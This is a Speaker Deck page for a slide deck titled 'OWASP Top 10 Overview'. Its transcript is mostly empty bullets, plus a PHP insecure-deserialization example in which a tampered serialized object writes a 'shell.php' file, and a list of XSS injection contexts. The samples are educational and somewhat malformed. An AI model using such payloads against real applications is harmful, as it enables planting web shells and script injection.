Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
OWASP Top 10 Overview
Search
evandentremont
December 17, 2020
Programming
48
0
Share
Embed
Copy iframe code
Copy JS code
Copy link
Start on current slide
OWASP Top 10 Overview
evandentremont
December 17, 2020
More Decks by evandentremont
See All by evandentremont
1,2,3,4 I Declare Cyber War
evandentremont
2
1k
Fixing Infosec
evandentremont
0
110
BTC: Currency or Commodity?
evandentremont
0
90
Immunizing IoT
evandentremont
0
93
Defeating Next Gen Firewalls
evandentremont
1
80
Next Gen Botnet C&C
evandentremont
0
85
SQLi Injection attacks & mitigation
evandentremont
0
110
Other Decks in Programming
See All in Programming
ユニットテストの先へ:テスト技法で要求・仕様を整理するJava開発実践 / Beyond_Unit_Testing_Practical_Java_Development_Techniques_for_Organizing_Requirements_and_Specifications
shimashima35
0
400
Vue × Nuxt × Oxc どこまで使える?実運用の現在地
andpad
0
250
正しくソフトウェアを作る、前提を疑うための認知の視点 / doubt-premise
minodriven
21
6.6k
net-httpのHTTP/2対応について
naruse
0
480
AI時代のUIはどこへ行く?その2!
yusukebe
21
7.2k
Webフレームワークの ベンチマークについて
yusukebe
0
170
Agentic UI
manfredsteyer
PRO
0
160
Spring Security 実践 ─ GraphQL APIで実務に役立つ 認証・認可 を学ぶ
wagyu
0
230
Honoでのサプライチェーン侵害対策 〜 3つのライブラリに学ぶ
yusukebe
4
1k
Creating Composable Callables in Contemporary C++
rollbear
0
130
「エンジニアインターン、どうやって取った?」準備のリアルを語るLT会 Progate BAR
akiomatic
0
130
不変条件と整合性境界—ビジネスが決める設計判断と実現パターン / Invariants and Consistency Boundaries
nrslib
13
4.5k
Featured
See All Featured
The Limits of Empathy - UXLibs8
cassininazir
1
360
Statistics for Hackers
jakevdp
799
230k
Tell your own story through comics
letsgokoyo
1
950
GraphQLとの向き合い方2022年版
quramy
50
15k
Chrome DevTools: State of the Union 2024 - Debugging React & Beyond
addyosmani
10
1.2k
Building the Perfect Custom Keyboard
takai
2
790
Exploring the relationship between traditional SERPs and Gen AI search
raygrieselhuber
PRO
2
4k
Un-Boring Meetings
codingconduct
0
310
VelocityConf: Rendering Performance Case Studies
addyosmani
333
25k
Organizational Design Perspectives: An Ontology of Organizational Design Elements
kimpetersen
PRO
1
720
Accessibility Awareness
sabderemane
1
140
Designing for Timeless Needs
cassininazir
1
250
Transcript
None
• • •
• • • • • • • • • •
• • • • • • • • • •
• • • • • • • • • •
• • • • • • • • • •
• • • • • • • • • •
• • • • • • • • • •
• • • • • • • • • •
• • • • • • • • • •
• • • • • • • • • •
• • • • • • • • • •
• • • • • • • • • •
None
• • • •
None
• • •
None
None
<?php class file { public $file = “file.txt” public $data
= “some text” function __destruct(){ file_put_contents($this->file, $this->data); } } O:3{:”file”:2:{s:4:”file”;s:12:”file.txt”;s:4:”data”;s:9:”some text”};}
O:3{:”file”:2:{s:4:”file”;s:9:”shell.php”;s:8:”<?php ?>”;s:9:”some text”};} <?php file_put_contents(”shell.php”, “<?php ?>”); ?>
• • • •
None
None
• • • •
• – <script>X</script>, <!--X-->, <div X=”y”>, <X></X>, <style>X</style> • –
<div attr=X>, <div attr=”X”>, <div attr=’X’> • – <script>alert(‘X’), data=’X’, <div onClick=”data=’X’” – selector { property:X;}, <span style=”property:X;”>
None
None
None
• • • •
None
None
• • • • • • •
None
None
None
• • • •
None
• • • • • • •
None
• – • – • –
• – • – • –
• • • • •
None
• • – – •
• • • • • •
None
• • •
None
evandentremont
shimashima35
andpad
minodriven
naruse
yusukebe
manfredsteyer
wagyu
rollbear
akiomatic
nrslib
cassininazir
jakevdp
letsgokoyo
quramy
addyosmani
takai
raygrieselhuber
codingconduct
kimpetersen
sabderemane
